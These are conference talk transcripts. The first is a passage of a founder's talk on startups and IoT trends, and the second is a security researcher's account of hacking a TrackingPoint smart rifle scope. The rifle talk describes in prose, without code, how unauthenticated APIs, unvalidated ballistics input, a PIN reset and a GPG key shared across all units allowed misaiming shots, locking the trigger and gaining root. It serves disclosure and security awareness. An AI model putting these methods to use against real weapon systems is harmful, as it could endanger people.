He was the guy appointed by the US government to develop the first airplane that could transport people, and Langley got all the resources he needed. He got fifty thousand dollars from the War Department and twenty thousand dollars from the Smithsonian — this was at the end of the 1800s — he got access to all the engineers in the world, or at least in the US, and access to universities, and he could do whatever he wanted. And he knew that if he built this plane, he was going to be so famous and be in the history books forever. So he used all this money and started to build this aircraft, and the camera guys were with him all the time, because they wouldn't miss the moment when he was flying — he really wanted to get famous. What happened was that in 1903, on December 8th, he crashed for the second time — the first time was a little earlier. He had a catapult, so the airplane was ejected up into the air and was supposed to fly, and when he crashed the second time, he gave up and decided that this was not possible. In the meantime, there were two other guys, whom we all know about: the Wright brothers. They were a little different. They didn't have any money, they didn't have any network, they didn't have any support from the government. But they knew that if they could make an airplane, they would change the world. So they started to walk around, and when they told people that they would change the world, people said: that sounds interesting.
"I'll join you," and, "I'll join you," and, "I'll join you" — and they started to form a great group of people who wanted the same thing as them. They didn't have the money, but they had the passion, and they had a goal, a why for what they did. People go with you because of why you do things, not necessarily what you do. So the Wright brothers flew on December 17th, 1903, and are known as the developers of the aircraft. The difference between them and Pierpont Langley was that Langley wanted to be famous, and not many people want to spend their time so that one person can become famous. But if you have a common mission to change the world, people actually want to join you. The interesting thing here is also that Pierpont Langley got sick after that; he died in 1906, I believe, as a poor and unhappy man. So make sure you do things for a reason. You can't just do things — you need a reason, and if you have a reason, you don't need all the money. You get people to join you, people with the passion to actually do it, and passion is one of the strongest driving forces for personal success. I think passion is the most important attribute of a person. Think about it yourself: the things you're really interested in — you read all the literature, and whether it's day or night you don't care, whether it's the weekend you don't care. You just want to understand it. And when you put all that competence into the work you do, you perform so much better than the person who is there from eight to four. So passion is extremely important.
How many of you guys have implants — not silicone implants, but silicon chip implants in your body? Anyone with an access chip in your hand? No electronics in the body? Because that's going to come. A friend of mine — I have a pretty sophisticated surveillance system in my house, and the guy who installed it has a chip in his hand. He doesn't walk around with all his cards; he just has a chip under his skin, and he holds it up to the card reader every time he wants to get in. He has programmed it for all the places where he is allowed access. So I think one of the challenges for you guys — you are passionate people and you are embedded designers — is that we have to get electronics into the body, right? Wearables, that's boring, that's not for us. We are embedded designers; we want in-body electronics. Look at this guy: he has a complete computer under his skin. This is hardcore passion for embedded and wearables, right? So there's a way to go — none of you has even a small little capsule, and this is the next step. It has all kinds of sensors, and he has an app where he can read everything from his body. I don't know how you replace the battery — maybe his wife is a surgeon or something. So let's go quickly back to building a company, because the other thing we need to make sure we do when we build a company is to look at what the real big trends in the world are.
There are so many things we can do, and no matter what we do, we have to go through almost the same procedures — so let's make sure we choose the right things. Today there are a couple of megatrends, and healthcare, or health-related products, is one of them. It's everything from this Fitbit watch, which is probably soon going to tell me I've got ten or twenty thousand steps up on the screen — that's the consumer products — to more medically oriented products, senior-care products, and so on. Remember, we get older and older, and we need a lot more support in the home to sustain the quality of living we have today, so a lot of the health things are going to be moved into the home. There's a huge area there. Home automation has been talked about for years and years, but now, with the new Thread networks, new radio protocols, new low-power controllers, and the new things that make batteries last for ten years instead of three, like mine do, it's starting to become a market that is going to expand quickly. The other thing: when I came into Novelda — this was in 2013, after we sold Energy Micro — the company did everything. We had a radar in landmine detectors, we had ground-penetrating radars for finding pipes, we could measure ice thickness and snow depth, we could look into the body — you name it.
We were into all kinds of things. The first thing I had to do was focus the company, and we focused it in three directions. Sleep monitoring is one of them, which I showed you earlier; the others are people detection and medical monitoring. Medical monitoring because the radar can see into the body: if I put the right radar chip in here, I can actually see my heart movements, and if I put this on the nightstand, it can read all my breathing patterns from the nightstand. That can be used for many, many things. The same technology can be used in smart buildings. Just think about a hotel room: you have to put a card in the door to tell it that you are there, and if the card is still there when you're not, the air conditioning runs all the time — and all of us get two cards, so the air conditioning is probably running all the time. A radar can detect you while you are sleeping under the comforter and actually detect that there is someone breathing in the room; it's that sensitive. And it can be used for evacuation control: if people come into a building and you ask where the people are, you can detect where there are people. So there are a lot of different applications that can use this kind of sensing technology. The other day we installed a test system at the police station in Trondheim, in the cells where they put drunk people. They have four cells for that, and the new regulations say they have to count the breathing frequency every 20 minutes. Think about the resources needed if you are going to stand there and count people's breathing frequency every 20 minutes — it's impossible. But we installed the radar, and now we can see the breathing pattern of all the people in there and
report that back to the control room. So that's just a little bit about it. We selected a few verticals — that means taking a risk. Going wide feels safer but is actually much more risky; going narrow is a risk too, but at least you know what you are doing. Okay, this is an area where many of you know a lot: there is a big-data trend, and there are a lot of different layers in the Internet of Things. In this session today there is going to be a lot about security, and security is a really, really important thing. With all the sensors on the body, in the body, and in our houses, the security part is really important — who is going to get access to the data? The protection layers here need to be sophisticated, but there is always a risk of being hacked, and that is one thing that is going to prevent people from using Internet of Things devices: they are afraid they are going to be hacked. The other thing: you have the cloud services on top, and you have the fog, which is more like the in-house processing before data goes to the cloud, and then in between you have the sensors. Every company today wants a sustainable business; they want a subscription. When I control my summer house, for example, I have a subscription with a company so I can control my house — an internet subscription I need to have — and if that company goes under, all the hardware and everything I've installed is worthless. So I think the biggest challenge for small companies coming up is: do we think we can offer better security than Amazon? Or do we think we can convince the customer that we have better security than Amazon? That is an important question to ask yourself. And in my case: can people convince me that they are going to stay in business, if I'm going to buy a sleeping sensor from Novelda, or a watch, or whatever
that goes through the cloud — what happens if they go under? Where is my data? What happens to my data? I use Dropbox a lot; what happens if Dropbox goes under? What happens to the data? All the security questions, all the sustainability questions about all the small companies, are going to be a challenge. So when you make a business plan you have to think about them, because those are the major questions in the industry today that you need to convince the customers about. But there is no doubt that the opportunities are huge. We know this is going to grow into a huge business: the number of devices today is 15 billion, and it's going to grow to 75 billion connected devices. There are great opportunities for everyone, and we can just go out and pick one — but we have to pick the right ones. And we have to fight and work hard to make it happen; it's not easy, and we need to get the absolute best people. When I looked at CVs for machine learning, for example, we found some people in Cambridge in the UK who actually had a lot of grants from Google, from Facebook, from Apple — million-dollar grants for their great work. This is the kind of people we need to find, because remember, when I was educated I was told that a computer could never be smart enough — the brain is smarter than anything else, no matter what you do — and that's about to change, so we need the people who change that, who actually think a little differently. Okay, I have one more thing I want to say, and that's going back to my childhood. I'm going to use a quote from Einstein: "I have no special talent. I am only passionately curious." I think that's the most important characteristic of me, and why I want to do all this. Thanks. Questions? They can be in Norwegian if you want. Okay, no questions — that's good. I'm colorblind, so if you pick red or green it doesn't really matter to me.
IoT is the new word that every developer and company talks about. But do we need all this? When is it too much? Alf-Egil was caught by the IoT monster years ago and is now trying to escape. He has been involved in IoT technology his entire career and will also look at the good sides of IoT and how Norwegian companies have enabled this new trend. As the co-founder of Atmel Norway and Chipcon, and now a board member of Silicon Labs and the CEO of Novelda, he will look at the challenges for both large and small companies establishing themselves in the IoT business. Does IoT require a new, young, disruptive mindset, or will the old-school founders make it?
10.5446/50524 (DOI)
Okay. Hi. Morning. Welcome. My name is Runa Sandvik and I'm going to talk about 10 things I learned while hacking a Linux-powered rifle. So I'm originally from Oslo, Norway, but I figured I'd give the presentation in English, since it's just a lot easier with all the English terms, and talking about rifle components is a bit easier in English too. But feel free to ask questions in Norwegian if you want to. So this is a presentation that I gave at Black Hat and DEF CON in Las Vegas last year, and I figured I would give the same talk, but also summarize, sort of put an emphasis on, 10 things that I learned or took away from this project. The number one question that I usually get when I say that I hacked a rifle is: why? And the sort of default answer for me is: because I can. It's one of those things where, living in Norway and reading a lot about Black Hat and DEF CON, which are these two massive hacker conferences in Vegas, and seeing all the amazing things that the researchers do at these conferences, I just always had a bit of a bucket-list item of pulling off a fantastic project at one of them. And hacking a rifle, I think, certainly put it on the list. So lesson one — sort of the number one thing that I learned, or really something that I figured out before I even started working on the project — is that people rarely pay attention until you make a statement. If I were to hack a toaster, for example, or a fridge magnet or a Barbie doll, I mean, it's fun, it's cool, but it doesn't get you the same level of attention as hacking a car or hacking a rifle or hacking an airplane or a satellite. You get the idea. People aren't going to pay attention until you make a statement like that. And they're not going to see the value in securing the product either, until you can really, really highlight why this matters. So that was sort of the number one thing.
In part, I wanted to hack a rifle because I can, but I also wanted that statement piece to really get people to pay attention. So the rifle that we hacked — and when I say we, this was a project that I did with my husband. He took me to a gun show where TrackingPoint had a stand showing off these rifles that have this sort of computer inside the scope, a wireless network, mobile apps, and all sorts of fancy things. And I said, well, we should totally buy one, hack it, and present in Vegas. And he said, okay. So that's what we ended up doing. The rifle that we bought is a TrackingPoint TP750. That just means it's a standard stock Remington 700 bolt-action rifle: it takes one bullet at a time, you put one bullet into the chamber, you load it, you fire, and you have to do it all over again. A standard stock rifle. But TrackingPoint then put a custom scope on it. I have some photos later to really illustrate this, but inside the scope is a bunch of PCBs that make up the little computer inside it, and there's a sort of mechanical link between the scope and the trigger as well. The hardware platform is called Cascade on the TP750. TrackingPoint has a couple of other firearms as well with a different hardware platform, but we have been able to confirm that the issues we found on this rifle are also present in the other firearms running the newer platform. It runs a modified Ångström Linux, which is the same as you'd find on a BeagleBone Black — so it's pretty much like a really small BeagleBone Black inside a rifle. You also have 16 megabytes of flash storage for the kernels and then 4 gigabytes for the file system. So I also wanted to quickly explain exactly what makes the TrackingPoint rifle interesting, and that is what TrackingPoint calls the tag, track, and exact system.
So up in the first picture to the left, where it says tag: the whole idea is that you're behind the rifle, you're looking inside the scope, and you identify your target. You put the crosshairs straight on your target and then tap the red button that's by the trigger on the rifle. At that point you tag your target, so that the software inside the rifle will actually help track your target as it moves back and forth. You can pull the trigger, but it's not going to release and fire until you've managed to line up the rifle in such a way that you will hit your target every single time. So it's like sniping for dummies, pretty much. I mean, coming from Norway, I had zero experience with guns, and I did not miss a single shot. So that gives you an idea of what this firearm can do. Some quick things to keep in mind: our attacks require the Wi-Fi to be on. When you're using the rifle, you probably do want to use the scope, so you power the scope on, but you don't have to turn on the Wi-Fi unless you really want to. So we do require the Wi-Fi to be on to actually do any of the stuff that we're doing. We cannot fire the rifle remotely. We can do a lot of interesting things, but we cannot fire remotely — that's still a physical mechanism. And the TP750 is a firearm even without the scope. This means that even if I were to permanently brick the scope on your rifle, it will still function as a firearm. It's big and it's heavy and you can't really see what you're doing, but you can still pull the trigger and fire. So when we started this project, I had some experience with what I'll just call software hacking; my husband was more the hardware person. But we still had a lot to learn when we took on this project. And as with any hacking project, whether it's hardware or something else, you have to sit down and think about ways to get in.
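The tag/track/exact behavior described above — trigger held, but the shot only released once the scope's fire-control solution is good — can be sketched as a simple gate. This is purely my illustration of the idea; the function names, the milliradian error metric, and the tolerance value are all assumptions, not anything from TrackingPoint's actual firmware:

```python
# Hypothetical sketch of the "tag, track, exact" trigger gate:
# the shooter can hold the trigger, but the shot is released only
# when the computed aim error for the tagged target is within a
# tolerance. Names and tolerance are illustrative assumptions.

def should_release(trigger_held: bool, aim_error_mrad: float,
                   tolerance_mrad: float = 0.1) -> bool:
    """Release the shot only when the trigger is held AND the
    crosshair is within tolerance of the tagged aim point."""
    return trigger_held and abs(aim_error_mrad) <= tolerance_mrad
```

Under this model, holding the trigger while the rifle wanders off target does nothing; the shot goes the instant both conditions line up.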
You have to actually think like an attacker. You can't just take this thing out of the box and say, how would a normal person use this? You have to say, well, if I was really evil, what could I do? How could I get in? So the rest of the presentation is divided into rounds. I've got rounds one through three: round one covers the stuff that we tried initially — the things that we looked at, the things that we tried and failed with — and I'll summarize round one and then we'll step on to round two. So round one is the unboxing. You get the rifle, you pop the box open, and you try to figure out: what is it that you just bought? What does it look like? What can you do? So this is an illustration of the scope itself. As you'd expect, it has a microphone and USB ports. And the power button, which is just to the right of the USB ports on the bottom right — once you've powered on the scope, if you push the power button once, it will turn on the Wi-Fi. It also has some sensors for temperature and a couple of other bits and pieces. But fairly standard; it wasn't anything super exciting. We thought that the USB ports would actually lead to something good, but it turns out they are disabled on boot. So at this point we're like, okay, we have this rifle. It looks like this. It powers on, it has batteries and stuff, it has Wi-Fi. So what do you do? Well, you port scan — try to figure out what kind of services are running on this thing. There's port 80, so there's a web server, and port 554, so there's a video streaming service running as well. And that was it. We were sort of hoping for something more exciting, like port 22 for SSH or Telnet, or something that would just make this really easy. But no. So okay, we've got the rifle. We can't really just SSH to it and talk to it. So what do we do now?
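The kind of port scan described here — checking which TCP ports accept a connection and guessing the service — can be done with a tool like nmap, or sketched in a few lines. This is a minimal TCP connect-scan sketch of my own, not anything from the talk; only the result (80 open for HTTP, 554 open for RTSP, no SSH or Telnet) comes from the talk:

```python
import socket

# Services one might expect on an embedded Linux device; the TP750
# reportedly exposed only 80 (HTTP) and 554 (RTSP video streaming).
KNOWN_SERVICES = {22: "ssh", 23: "telnet", 80: "http", 554: "rtsp"}

def probe(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connect() to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def scan(host: str, ports) -> dict:
    """Map each open port to a service guess (or 'unknown')."""
    return {p: KNOWN_SERVICES.get(p, "unknown") for p in ports if probe(host, p)}
```

Run against the scope's Wi-Fi address, a scan like this would come back with just the web server and the video stream, which is exactly the dead end the talk describes.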
Well, TrackingPoint developed two mobile apps for the purpose of interacting with this rifle. One app is called ShotView. All this app does is, once you're connected to the Wi-Fi of the rifle, you can open it and it allows you to see, via that video streaming service, exactly what the shooter is seeing inside the scope. So you can't do anything. There are no buttons. There are no settings. There's nothing that you can change or touch or interact with. You can just watch the stream, which TrackingPoint would say is a really good thing for training purposes. The other app, the TrackingPoint app, is a bit more exciting because it gives you some settings that you can change. You can change the temperature, the wind, the type of ammo used on the rifle. Every single time you tag a target or take a shot, the rifle will record and store a video of that on the scope that you can then download onto your phone. So if you just took this amazing shot and you want to put it on Facebook, the rifle makes that really easy. And there's a passcode as well. When you initially start the rifle, it starts in what's called traditional mode. At this point, if you pull the trigger, it will fire and you may miss your target. Advanced mode is where you get the tag-track-and-exact system, where you have to tag your target. You can hold the trigger, but it's not going to fire until the whole system has calculated that if I fire right now, I'm going to hit the target. So you can set a passcode for that as well. Digging around some more, WPA2 is used on the Wi-Fi. We found that it's just plain text communications between the apps and the scope, so between your mobile phone or tablet or computer and the rifle itself. The rifle uses HTTP, so just plain text really, or clear text, to pull updates from TrackingPoint's website.
So the way that it does that is that you connect your phone to the rifle and you pull the version of the software and the serial number from the rifle onto your phone. Then you take your phone, put it on the internet again, and talk directly to TrackingPoint's website and say, hey, here's my serial number, here's the version I'm currently running, do you have an update? TrackingPoint will go, yes, here's a package for you, and send it back to your phone. You plug your phone back onto the rifle's Wi-Fi and it will push the package up. So when we saw that, we were like, holy shit, this is really exciting, there are packages in the clear. But the updates are actually GPG encrypted and signed. They can only be decrypted with a passphrase that only the scope knows, so it wasn't a passphrase that we could easily guess. So at this point, we don't have a whole lot of interesting stuff. There are bits and pieces that are sort of interesting, but not something that would actually give us anything really interesting to talk about. So we decompiled the mobile apps to see if there were some additional features that we just hadn't tried. If you pull out all the communication that the apps can do with the rifle, you end up with sort of a public API. There's something for package upload. You can pull the serial number, you can set a passcode, get the version number, set the type of ammo. There are some interesting bits and pieces, but nothing really juicy. And we also found that while the mobile app, or this API, lets you change wind and temperature and ammo, it's only within a set range. So if you try and change the temperature, it's going to give you, I think, five values that you can choose from. So you can't, for example, set the temperature to be minus 5,000. It does do some input validation. So we're like, okay, well, we don't have anything super exciting.
We have a couple of buttons that we can push, but they don't really do anything. We have these apps, but our input is always validated. So what do we do next? We decided to just start pushing buttons to see if maybe there's a magic button combo that would open admin mode or pop open SSH or something. But no, sadly not. Which led us to summarize round one: the SSID of the Wi-Fi contains the serial number of the rifle and you cannot change it. So identifying a TrackingPoint Wi-Fi is pretty simple, because it's going to be TP underscore and a bunch of numbers, which is the rifle's serial number. The password is easy to guess and you cannot change it either. And any RTSP client can stream the scope view; you can stream it on your computer if you want to. Like I mentioned, the API validates input, and I say it's unauthenticated because anyone who can get onto your rifle's wireless network can use the mobile app. There's no check to see, is this Runa's phone talking to me right now? So anyone who can get on the Wi-Fi can use the apps. I mentioned that you can set a four-digit PIN to lock advanced mode, but four digits is pretty easy to brute force, and there's also a public API call that just resets the lock completely. So you could easily connect to someone's rifle, reset the PIN if it's there, and then set your own PIN so that the owner can't use it. And the updates are GPG encrypted and signed. So at this point, we had spent about four or five months of what ended up being a year, off and on, working on this project, and we were getting pretty close to the time when you have to submit a talk to Black Hat and DEF CON. We were like, we really, really need to find something better than this. Which brings us to lesson three: you need to be willing to potentially brick the device.
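To put a number on how weak that four-digit lock is: 10,000 candidates is nothing for a script. This is an illustrative sketch, not TrackingPoint's actual API; the `try_pin` callback stands in for whatever request the real attack would send over the rifle's Wi-Fi:

```python
def brute_force_pin(try_pin):
    """Exhaust all four-digit PINs; try_pin(pin) should return True on success."""
    for n in range(10000):
        pin = f"{n:04d}"          # "0000" through "9999"
        if try_pin(pin):
            return pin
    return None                   # no four-digit PIN matched
```

Even at a sluggish ten attempts per second, that is under 17 minutes in the worst case, and the public reset call mentioned above makes guessing unnecessary anyway.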
There comes a time in any hardware project where you need to just suck it up and open the thing up to see if that gives you more access, which potentially bricks it later on, but if you're lucky, you can still salvage some bits. So for round two, we decided to take a closer look at the inside of the scope. In this case, you see the scope on top with a bunch of PCBs, and then you see the red button by the trigger. That's the red button that you push to tag your target. And at that point, the trigger is locked. So you can pull the trigger all you want, but it's not going to release and fire until the rifle has decided that now is the right time. Just a slightly different image showing pretty much the same thing. And here's what it looks like if you pop the scope open: a bunch of PCBs and some buttons up top, which look like this up close. But this photo is a bit more interesting. All the PCBs in this photo are double-sided, so that means that there's stuff on either side of every single PCB in here. You see two PCBs on either side, then you have this triangle, there's stuff on all sides, and the whole thing holds together, so you can't easily just pull it out. In addition, towards the top of the photo, there's a bunch of tiny, tiny cables that connect that PCB to the rest of the rifle, so you can't just pull it out, play with it, and pop it back in. So we figured we needed to find a way to connect a computer to this rifle without taking the PCBs out. We really wanted to avoid cutting any cables or doing anything that could break it. Now, if you watch any hardware hacking talk, a lot of people will talk about UART and how that makes it really easy: you just hook up some cables, plug it into your computer, and you have root access. You get a console and you have full access to the system. So that's what we did.
And when we saw this screen, we were like, yes, we finally got it. It's actually booting. We got the ASCII. This is amazing. But then this happened, and to highlight it a bit: console access, but with a login prompt. So it was pretty clear that TrackingPoint didn't really want anyone logging on to the rifle in this manner anyway. We did spend some time trying to guess the login, which was a waste of time because we didn't really get anywhere with that. We did get to see, if the other image shows it, maybe not, that you can interrupt the boot process and get this additional, almost like a debug menu. You can dump the memory, look at the boot parameters, and change a couple of things in there. So we spent a long time trying to just dump the memory, because we figured, well, if we don't have console access, if we can't log in, then maybe we can just dump the memory and we'll get everything anyway. That's when we learned that the kernels, which is this part you see when you boot, are on a different chip than the file system that we're after. So we spent a long time and basically just dumped four Linux kernels. At this point, we had to summarize with two amazing bullet points: console access is password protected, and the kernels and file systems are on separate chips. I think at this point we had actually submitted to both Black Hat and DEF CON and had stated that we had all of these amazing results, and we didn't. So we went into crunch time to really find something to present, because otherwise we would go on stage in Vegas and say, here's this thing, we didn't get in. Which sort of summarizes lesson four: it's not always as easy as it looks on YouTube. Everyone talks about, oh hey, I got UART and then I got full-on console access, and we're like, no, no. It doesn't always work like that.
Sometimes it takes a bit longer and you have to be a bit creative to actually find the stuff that you're after. So for round three, remember how I said you have to be willing to break the device? We got down to, well, we don't really have anything, the conferences are coming up really soon, and I know this is a $13,000 rifle, but we need some stuff. So we ended up pulling out the PCB, because we figured, if we can't get to the file system by dumping memory and we don't have console access, let's just pull the PCB, pull the chip with the file system, and dump it that way. Except it's pretty hard to figure out which chip has the file system. We spent a long time reading a lot of schematics and trying to figure out which one could possibly be the chip with the file system. And I can tell you, we actually pulled the wrong chip first. We ended up pulling the FPGA. So when we put it back on, the rifle never quite worked the same way again. I mean, it still boots and it has Wi-Fi and you can technically fire. It just doesn't work the same way as it used to. So the file system was actually hiding under here. At this point, we were really wondering, how on earth do you read data off of a chip like that? And thanks to some amazing people who helped us out with the project, we learned that there's something called eMMC. It's like a sort of USB memory card type chip on the side of the PCB. You don't even have to pull the PCB from the rifle. You can do the same thing as with UART: hook up the right cables and you get access. So we're seeing all of these pins, and we're like, okay, but how do you go from these pins to an actual connection to your computer? Well, there's a $100 device for that. Pretty cheap, pretty easy. So all hooked up, it looks sort of like this.
And at the end of it, there's a USB cable that you just plug into your computer, and it pops up like a USB drive. Full access to the system. At this point, we're like, yes, we finally have something. And this was like two months before this massive conference in Vegas. But now came the hard part. We finally had access to the system, but finding any vulnerabilities that we could use as malicious attackers was still the challenge. So we poked around the file system to figure out how the system works: what is it that you communicate with when you're using the mobile apps? We managed to piece together this admin API. I haven't listed all the calls that we got access to, but the bottom one says SSH accept. This is the type of API call that, if you know about it, you can use it, and this one will open port 22 so you can SSH in. There's a bunch of other calls as well. We decided not to name all of them, because the US military does own and use some of these rifles, and TrackingPoint has also stated that any US agency that wants to use their firearms to fight ISIS in Syria will get the firearms for free. So we figured we'd just not name some of these API calls, just not to piss anyone off. There's one call that I'll just refer to as the system backend. It's one call that, if you know about it, you can use, which will open a port in the firewall on the rifle, and you can use a standard UNIX socket to connect to it and talk directly to the system backend. So while the API that the mobile app is using validates your input (like I said, if you're changing the temperature, you've got five values to choose between), if you're talking directly to the system backend, you can set whatever you want and it's not going to reject it.
So if you want to say that the temperature is minus 50,000, you can, and it's going to happily accept that value. By talking directly to the system backend in this way, you can make temporary changes to the system, and you can change things like wind, temperature, and ballistics values. You can change the ammo, you can make the scope think that it is attached to a totally different firearm, and you can control the solenoid, so you can actually lock the trigger. So while we cannot fire remotely, we can prevent anyone from actually pulling the trigger. So here's a video demo that shows how the rifle works normally. The top right box there is the video from the scope itself. What you'll see is the crosshairs move, then we tag the red circle in the middle, and then you'll see us fire. So as the crosshairs move, we're just trying to figure out where to drop the tag. That's the tag. And this was 50 yards. I forget how much that is in meters, but it's not very far. It can go a bit further, but this was just for the purposes of the video. So it's pretty easy, nothing super exciting. Now this one is a bit more interesting. At this point, by communicating directly with the system backend, we said that the bullet is heavier than it really is. We went from a default value of 125 grains to, I wonder if it was 50,000, some crazy, crazy number that it just happily accepted. What you see again in the top right is the same target that we just fired at. You'll see that we're going to try to again put the crosshairs on the red blob in the middle, tag the same target in the same spot, and fire. The crosshairs jump far to the right because we changed the value, and what happened is that we hit the target on the left instead. So by just changing one value, the weight of the bullet, we can hit a completely different target.
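The validation gap that demo exploits can be reduced to a toy model. The names and the allowed-value set here are made up for illustration, not TrackingPoint's actual code; the point is simply that the app-facing API whitelists input while the backend applies whatever it is handed:

```python
# Assumed whitelist standing in for the five values the mobile API offers.
ALLOWED_TEMPS = {-10, 0, 10, 20, 30}

def public_api_set_temperature(state, value):
    """The app-facing API rejects anything outside the whitelist."""
    if value not in ALLOWED_TEMPS:
        raise ValueError("temperature out of range")
    state["temperature"] = value

def backend_set(state, key, value):
    """The internal backend applies whatever it is handed, with no validation."""
    state[key] = value

state = {"temperature": 20, "bullet_grains": 125}
backend_set(state, "bullet_grains", 50000)  # absurd value, happily accepted
```

So a value like 50,000 grains sails straight through the backend path, while the same request through the public API would be refused.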
And there is no indication in the HUD here to the user that this is going on. So these are all temporary changes. We wanted something a bit more exciting than that: we wanted to try to make permanent changes to the rifle. Which leads us to lesson five: you need to understand the tools you secured the device with. I guess that is more of a lesson for the vendor and not for me, the hacker. So, digging around the software update script of the rifle. I mentioned the packages are all GPG encrypted and can only be decrypted with a passphrase. Once we were on the scope, we found the update script and we found the passphrase that we needed to decrypt the packages. So pulling ten versions' worth of update packages was really easy, and you could decrypt the individual packages as well and then modify them. And the reason you could modify them is that TrackingPoint has two GPG keys. One, which the company holds, is the set of keys it's using to actually sign and encrypt the updates in the first place. The second key, or second set of keys, is on the scope. And every single TrackingPoint firearm has the same GPG key on it. So if you have access to that key, you can create an update that is valid on every single TrackingPoint firearm out there, which allows you to make persistent, permanent changes to the system and also gives you root access. Because at this point we had found that, yes, we can make it fire to the left or to the right, we can make it not fire at all, but we still wanted to be able to SSH into the rifle. So I created a custom software update that just added our own user to the system. This is a video that will show us trying to log in as the user hacker. You'll see that fail, because that user doesn't exist on the system. Then we'll upload and apply our custom update, and then we'll try to SSH again.
So initially we're just using the SSH accept call to open the port. We try to log in. It fails. And this is what you see inside the scope when you're applying the software update. It added the user to the user table, and then it just reboots and loads the HUD again. We try to SSH one more time, give the password, and get root access. Which goes to show lesson number six, again a pretty simple one: a motivated attacker will always find a way in. Granted, it took us almost a year on and off, a very long time. It wasn't like these YouTube videos where they're hooking up UART and they're in ten minutes later. It took a long time, but it was a really, really fun project. So for the round three findings: the admin API is unauthenticated. This means that anyone who can connect to the wireless network and knows the right API call to use can communicate with the system backend. There are no additional checks. The only thing that can give away that someone has connected to the rifle is that when you're inside the HUD, up in the top right corner, there's a little Wi-Fi indicator with a number below it. It will say one or two or three depending on how many people are connected. But I can assure you, if you're looking inside that scope and you're really focusing on your target, you're not going to see this tiny number up in the right-hand corner change. That, and anyone who's got full access to the system like this can easily just disappear that little icon or change the numbers. The system backend is unauthenticated. The system backend does not validate input, which is what allowed us to change the bullet grain value. The GPG key on the scope can encrypt and sign updates for any TrackingPoint firearm. So at this point, we knew that if you wanted to make permanent changes to the system and if you wanted root access, you had to use a software update to do so, which is fun.
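The real flaw in the update scheme is not GPG itself but key distribution: with identical key material on every scope, "signed by a scope" means nothing. Here is a conceptual sketch using an HMAC as a stand-in for the signature; this is an assumption for illustration, not their actual GPG construction:

```python
import hashlib
import hmac

SHARED_KEY = b"same-key-on-every-scope"   # illustrative stand-in

def sign(update: bytes) -> bytes:
    """Anyone holding the shared key can produce a valid tag."""
    return hmac.new(SHARED_KEY, update, hashlib.sha256).digest()

def scope_accepts(update: bytes, tag: bytes) -> bool:
    """The scope accepts any update whose tag matches the shared key."""
    return hmac.compare_digest(sign(update), tag)

# The vendor signs a legitimate update...
legit = b"firmware v1.4"
assert scope_accepts(legit, sign(legit))

# ...but anyone who dumped the key from one scope can forge one too.
forged = b"firmware v1.4 + adduser hacker"
assert scope_accepts(forged, sign(forged))
```

Per-device keys, or a verify-only public key on the scope, would have kept one compromised rifle from being able to forge updates for the whole fleet.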
But we wanted to find an additional way of getting in. So if you want to watch the video, it's on YouTube, but we found a remote code execution as well. So without a software update, you can still get straight-up root access on the rifle. And you would think that after talking about root access and custom software updates and remote code execution on this thing, it's pretty bad. But I would say that it's actually not all that bad. When you look at this hardware project or IoT device and compare it to other IoT devices, TrackingPoint actually did a pretty good job securing it. The USB ports are disabled during boot; you can't do anything with them. Even if you just try to plug in a USB stick, nothing will happen. There's no power going to those ports. The media is deleted from the scope once you download it onto your phone. This means that if someone else were to connect to your rifle, they're not going to see the shots that you took two months ago if you have already downloaded them; they're deleted from the scope right away. WPA2 is used, even if you cannot change the wireless password. The API does validate user input, and I added a little asterisk to it because the API I'm talking about is the one that you're using when you're using the mobile app. So at least a random person with the mobile app can't do any real damage; you need to know the other API calls to actually do anything fun. Console access is password protected. We had to have a software update or remote code execution to actually get in, and this is something that we didn't get until we had really taken the whole thing apart. Software updates are GPG encrypted and signed, so they tried. They didn't implement it the way they probably should have, but it does mean that random people who aren't willing to invest a year's worth of time researching a project aren't going to go and mess with people's rifles.
So they actually did a pretty good job securing the system. But, I guess another lesson for the vendor and not for the hacker: companies need a process for handling security issues. And this is very, very true for TrackingPoint. When we submitted to Black Hat and DEF CON, we contacted TrackingPoint at the same time, because we just wanted to say, hey, we're working on this project, we're hoping to present in Vegas, we haven't really found anything major yet, but we want to open the lines of communication and stay in touch. And we got zero replies until Andy Greenberg was writing this Wired article about our project and reached out to TrackingPoint a week before our presentation last August. Only at that point did TrackingPoint get in touch with us to hear what we had found and how they should fix it. So we went through all the different issues with them and told them exactly what they needed to do to lock this thing down even more. They stated that they would mail a USB stick with a patch to all their customers. That never happened. The only thing that did happen was TrackingPoint updated its website with a message that says you can continue to use the Wi-Fi on the rifle if you're confident there are no hackers within 100 feet. So this is the official comment from TrackingPoint when someone hacks their rifles. They're still in business, and later on one of the founders, I think, was quoted in the media as saying that, well, no one is going to hack the rifle of a red-blooded American. And I'm thinking, well, we did, and you should fix it. But they still haven't, so the issues are still there. Lesson eight: hacking a rifle sounds pretty fancy, but IoT attack vectors are pretty much the same across the board. If you look at presentations where people talk about hacking cars or hacking any other type of device, it's going to come down to the same approach for the most part.
The same issues pop up again and again and again. So this wasn't black magic. It wasn't stuff that you guys couldn't do either. It just took a very long time. But the way that we finally got in is a very standard approach, I would say. So we added a slide to give the vendors something, instead of just standing on stage and saying, hey, we hacked your rifle and you should fix it. We wanted to add that the issues we found are not unique to the rifle at all. Too many vendors ignore the low-hanging fruit. Especially if you look at the two bottom resources there, Build It Securely and the OWASP IoT Top Ten: two fantastic resources for finding really, really common issues in IoT devices. Whether it's default passwords, console access with no password, SSH, root access, all of these different things, there are a lot of standard bits and pieces there. Which leads me to this other point: innovation is the main focus in IoT, sadly. If you look at any Kickstarter page or any IoT device out there, people don't want the super secure box that does some stuff. People want the super awesome box, and then they don't really care if it's secure or not. Security always comes not even second; it's not something that people usually question. And it's not that people don't care. They just don't understand that security is something that they should question and something that they should want. Especially in Scandinavia, I would say that people just assume that it's there, because why would you create a device that is insecure? You just can't. It doesn't work like that, right? So innovation is the driving force in this space.
And finally, for anyone who's considering working on a hardware project, the final lesson for us was: don't be afraid to ask for help. If we hadn't asked for help and gotten help from a bunch of really, really awesome people, many of them former Intel people, actually, we would never have gotten the presentation that we really wanted to give. We would never have found as many of the issues as we found. If you are working on any sort of hardware hacking project, there are a bunch of people who are interested in this space and really happy to help out as well. There's a Norwegian named Marie Moe. She gave a presentation in Germany in December last year about hacking her pacemaker. Some of you might have seen that presentation, but she did the same thing. She had this project in mind, but she also reached out to people in the community for help with it, which just made her presentation a lot more awesome. So there are a lot of really awesome people in this space, and they're happy to help. So with that, I want to thank you all for coming. If you have any questions, I'm happy to take them now, or I'll be around later as well. Thank you. Thank you.
